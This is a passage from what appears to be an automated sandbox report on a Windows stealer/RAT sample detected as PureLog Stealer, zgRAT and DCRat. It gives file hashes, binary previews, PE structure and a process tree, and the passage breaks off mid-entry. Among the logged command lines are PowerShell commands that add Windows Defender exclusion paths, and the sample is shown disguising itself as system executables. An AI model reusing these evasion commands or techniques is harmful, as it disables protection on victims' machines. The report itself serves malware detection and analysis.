                                              Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi

                                              C:\Windows\System32\SecurityHealthSystray.exe

                                              Download File
                                              Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):4608
                                              Entropy (8bit):3.988710960625709
                                              Encrypted:false
                                              SSDEEP:48:66pDPtKM7Jt8Bs3FJsdcV4MKe27ndCvqBHmOulajfqXSfbNtm:9PZPc+Vx9MAvkAcjRzNt
                                              MD5:1ED1BB9B127716409543B8BD3DD09D00
                                              SHA1:5078C71DCB0EAA7B45EEF070A3D55A3CD28EC529
                                              SHA-256:5F6842C05B64391B27128221991052742E041AF921DB784770058B9BBD1A882A
                                              SHA-512:3EDB9E399DE5F7B6754CA09D89A56DA4130196294B976657C06B06FFE774A828372CB0163CC73126594CCD9E5AADE2D240F27C2A68B98AEDA043FC724901DFB4
                                              Malicious:true
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.../C.f.............................'... ...@....@.. ....................................@..................................'..W....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......(!..\.............................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.,.......#GUID...<... ...#Blob...........WU........%3................................................................

                                              C:\Windows\en-US\3fcc2d96fa9fd9

                                              Download File
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:ASCII text, with no line terminators
                                              Category:dropped
                                              Size (bytes):86
                                              Entropy (8bit):5.3880762370841415
                                              Encrypted:false
                                              SSDEEP:3:MVZEAM2Be6VoRt9z7E/ZKQRkH1IKHAH:MDM2BLG9XE/0EkH1pAH
                                              MD5:F19FA2180CBC4CD3E2E9DDA912CE40D3
                                              SHA1:8AFA5578136E050A437FCA8CF13EF37DA0832ABC
                                              SHA-256:36F4A6C2EA134313580547CC0BC5ACBA1A206505E4221A32B5028D9CAA387F3C
                                              SHA-512:F3BC3CEDA9E7065ABE12324E504EB26CFA733631455B51B2DE5B5A57C2869A8FCB3AE5B362C23B3BE982078DDB017E13B3EFE2BE5DE81268FC0348E0EEED15C5
                                              Malicious:false
                                              Preview:100qeDBLyhwtiRncGUN0K43WWRrWgfBMtHXnDXFkjBNcasAiTmAk1a476dTMWooTgj9a4AYsPmQJqb6nQJD4eb

                                              C:\Windows\en-US\XrtbrRarCSNElLBNKqySVVhxSZIi.exe

                                              Download File
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Category:dropped
                                              Size (bytes):2011136
                                              Entropy (8bit):7.569188314300448
                                              Encrypted:false
                                              SSDEEP:49152:dbmZsvFi8eKtbbrI5E6OmK0ETDZns1X/A4kAK:dbmZs9btb3IS6OBZs1vA4p
                                              MD5:B8AA70ED9243F5AA9C8DD45E8B6C01E7
                                              SHA1:8D871A1D93CC069413563D42DAD3F098F4AC5E5D
                                              SHA-256:4CEB69AFC05B1475459075F2CD5688F6AA8FE6A9FF6CAE0A25D742B650C62351
                                              SHA-512:D2DB111500BA7BC55F0913F888A38BA7B3986C2439FC0ABD0CCD7FEB4D4AC0D7863EDB28C903CCB78C1F59E8EB29CBC4132AB2977560C2A5C21F089BB5CA72A7
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: ReversingLabs, Detection: 63%
                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0..f................................. ........@.. ....................... ............@.................................P...K....... ............................................................................ ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H.......................,................................................0..........(.... ........8........E....M...).......N...8H...(.... ....~....{....9....& ....8....(.... ....~....{....:....& ....8....*(.... ....~....{....9....& ....8y......0..'....... ........8........E............j...F...............8........~....(J...~....(N... ....<g... ....~....{....9....& ....8....8N... ....~....{....9....& ....8u...8*... ....~....{h...:\...& ....8Q...r...ps....z*~....9@... ....81..

                                              C:\Windows\en-US\XrtbrRarCSNElLBNKqySVVhxSZIi.exe:Zone.Identifier

                                              Download File
                                              Process:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File Type:ASCII text, with CRLF line terminators
                                              Category:dropped
                                              Size (bytes):26
                                              Entropy (8bit):3.95006375643621
                                              Encrypted:false
                                              SSDEEP:3:ggPYV:rPYV
                                              MD5:187F488E27DB4AF347237FE461A079AD
                                              SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                              SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                              SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                              Malicious:false
                                              Preview:[ZoneTransfer]....ZoneId=0

                                              \Device\Null

                                              Download File
                                              Process:C:\Windows\System32\w32tm.exe
                                              File Type:ASCII text
                                              Category:dropped
                                              Size (bytes):151
                                              Entropy (8bit):4.889773485226114
                                              Encrypted:false
                                              SSDEEP:3:VLV993J+miJWEoJ8FXVZz4LvUVJFRrMQi0GKrv:Vx993DEU2N4sGQM8
                                              MD5:D1F35D716AD79B2ABD05E0F93405D0B1
                                              SHA1:92366ACCE8AD3751A177147D64CA4D3722D3E89D
                                              SHA-256:77ACB50E8CE2239C7A58E3E0B9ABAF2A6E254F641F5E3A28249D9B678B97E7A0
                                              SHA-512:31E3CD7F901DC11A995EA36CDD687F1A54230813354D59487F11DB3DC4814968211D096097B9AF312CC0EB36853ED10E68FD5A6A05C70877D2E1A18A5FC22F28
                                              Malicious:false
                                              Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 12/09/2024 15:38:37..15:38:37, error: 0x800705B4.15:38:43, error: 0x800705B4.

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                              Entropy (8bit):7.569188314300448
                                              TrID:
                                              • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                              • Win32 Executable (generic) a (10002005/4) 49.75%
                                              • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                              • Windows Screen Saver (13104/52) 0.07%
                                              • Generic Win/DOS Executable (2004/3) 0.01%
                                              File name:4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              File size:2'011'136 bytes
                                              MD5:b8aa70ed9243f5aa9c8dd45e8b6c01e7
                                              SHA1:8d871a1d93cc069413563d42dad3f098f4ac5e5d
                                              SHA256:4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6cae0a25d742b650c62351
                                              SHA512:d2db111500ba7bc55f0913f888a38ba7b3986c2439fc0abd0ccd7feb4d4ac0d7863edb28c903ccb78c1f59e8eb29cbc4132ab2977560c2a5c21f089bb5ca72a7
                                              SSDEEP:49152:dbmZsvFi8eKtbbrI5E6OmK0ETDZns1X/A4kAK:dbmZs9btb3IS6OBZs1vA4p
                                              TLSH:B695BF1775928E32C3605B358173463EA394EB753652EB0B361F14D3A80BBF58A722B7
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0..f................................. ........@.. ....................... ............@................................

                                              File Icon

                                              Icon Hash:00928e8e8686b000

                                              Static PE Info

                                              General

                                              Entrypoint:0x5ec69e
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                              Time Stamp:0x66D3A930 [Sat Aug 31 23:37:20 2024 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                              Entrypoint Preview

                                              Instruction
                                              jmp dword ptr [00402000h]
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al
                                              add byte ptr [eax], al

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x1ec6500x4b.text
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x1ee0000x320.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x1f00000xc.reloc
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x20000x1ea6a40x1ea800789b0e0fee56d5c57c8e9968cc0e9523False0.7891476132454128data7.572469597468066IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                              .rsrc0x1ee0000x3200x400fc29742be686b8c8941fbe272822da99False0.3544921875data2.6537284131589467IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                              .reloc0x1f00000xc0x200eeb7fd52684d3bd3952867d1d963844eFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountryZLIB Complexity
                                              RT_VERSION0x1ee0580x2c8data0.46207865168539325

                                              Imports

                                              DLLImport
                                              mscoree.dll_CorExeMain

                                              Network Behavior

                                              No network behavior found

                                              Statistics

                                              CPU Usage

                                              Click to jump to process

                                              Memory Usage

                                              Click to jump to process

                                              High Level Behavior Distribution

                                              Click to dive into process behavior distribution

                                              Behavior

                                              Click to jump to process

                                              System Behavior

                                              General

                                              Target ID:0
                                              Start time:14:16:58
                                              Start date:12/09/2024
                                              Path:C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Users\user\Desktop\4ceb69afc05b1475459075f2cd5688f6aa8fe6a9ff6ca.exe"
                                              Imagebase:0xa60000
                                              File size:2'011'136 bytes
                                              MD5 hash:B8AA70ED9243F5AA9C8DD45E8B6C01E7
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000000.1239399046.0000000000A62000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1566189118.0000000013111000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:11
                                              Start time:14:17:03
                                              Start date:12/09/2024
                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0sp3gwcw\0sp3gwcw.cmdline"
                                              Imagebase:0x7ff622aa0000
                                              File size:2'759'232 bytes
                                              MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              General

                                              Target ID:12
                                              Start time:14:17:03
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:13
                                              Start time:14:17:03
                                              Start date:12/09/2024
                                              Path:C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files (x86)\autoit3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe"
                                              Imagebase:0xf30000
                                              File size:2'011'136 bytes
                                              MD5 hash:B8AA70ED9243F5AA9C8DD45E8B6C01E7
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe, Author: Joe Security
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe, Author: Joe Security
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe, Author: Joe Security
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe, Author: Joe Security
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 63%, ReversingLabs
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:14
                                              Start time:14:17:03
                                              Start date:12/09/2024
                                              Path:C:\Program Files (x86)\AutoIt3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files (x86)\autoit3\Icons\XrtbrRarCSNElLBNKqySVVhxSZIi.exe"
                                              Imagebase:0x250000
                                              File size:2'011'136 bytes
                                              MD5 hash:B8AA70ED9243F5AA9C8DD45E8B6C01E7
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:15
                                              Start time:14:17:03
                                              Start date:12/09/2024
                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES6986.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC2072A4DD6B9C45BD955850FB555C1F90.TMP"
                                              Imagebase:0x7ff6404d0000
                                              File size:52'744 bytes
                                              MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              General

                                              Target ID:16
                                              Start time:14:17:04
                                              Start date:12/09/2024
                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\4gjcegjf\4gjcegjf.cmdline"
                                              Imagebase:0x7ff622aa0000
                                              File size:2'759'232 bytes
                                              MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              General

                                              Target ID:17
                                              Start time:14:17:04
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:18
                                              Start time:14:17:04
                                              Start date:12/09/2024
                                              Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES6B99.tmp" "c:\Windows\System32\CSC5918AA24663347D392372538DC1C654.TMP"
                                              Imagebase:0x7ff6404d0000
                                              File size:52'744 bytes
                                              MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:moderate
                                              Has exited:true

                                              General

                                              Target ID:31
                                              Start time:14:17:05
                                              Start date:12/09/2024
                                              Path:C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files (x86)\windows portable devices\RuntimeBroker.exe"
                                              Imagebase:0xae0000
                                              File size:2'011'136 bytes
                                              MD5 hash:B8AA70ED9243F5AA9C8DD45E8B6C01E7
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe, Author: Joe Security
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe, Author: Joe Security
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe, Author: Joe Security
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe, Author: Joe Security
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe, Author: Joe Security
                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe, Author: Joe Security
                                              Antivirus matches:
                                              • Detection: 100%, Avira
                                              • Detection: 100%, Joe Sandbox ML
                                              • Detection: 63%, ReversingLabs
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:34
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Program Files (x86)\Windows Portable Devices\RuntimeBroker.exe
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files (x86)\windows portable devices\RuntimeBroker.exe"
                                              Imagebase:0xe50000
                                              File size:2'011'136 bytes
                                              MD5 hash:B8AA70ED9243F5AA9C8DD45E8B6C01E7
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:37
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
                                              Imagebase:0x7ff741d30000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:38
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
                                              Imagebase:0x7ff741d30000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:39
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              General

                                              Target ID:40
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/'
                                              Imagebase:0x7ff741d30000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:true

                                              General

                                              Target ID:41
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high
                                              Has exited:false

                                              General

                                              Target ID:42
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
                                              Imagebase:0x7ff741d30000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:43
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:false

                                              General

                                              Target ID:44
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
                                              Imagebase:0x7ff741d30000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:45
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                              Wow64 process (32bit):false
                                              Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
                                              Imagebase:0x7ff741d30000
                                              File size:452'608 bytes
                                              MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              General

                                              Target ID:46
                                              Start time:14:17:06
                                              Start date:12/09/2024
                                              Path:C:\Windows\System32\conhost.exe
                                              Wow64 process (32bit):false
                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              Imagebase:0x7ff75da10000
                                              File size:862'208 bytes
                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                              Has elevated privileges:true
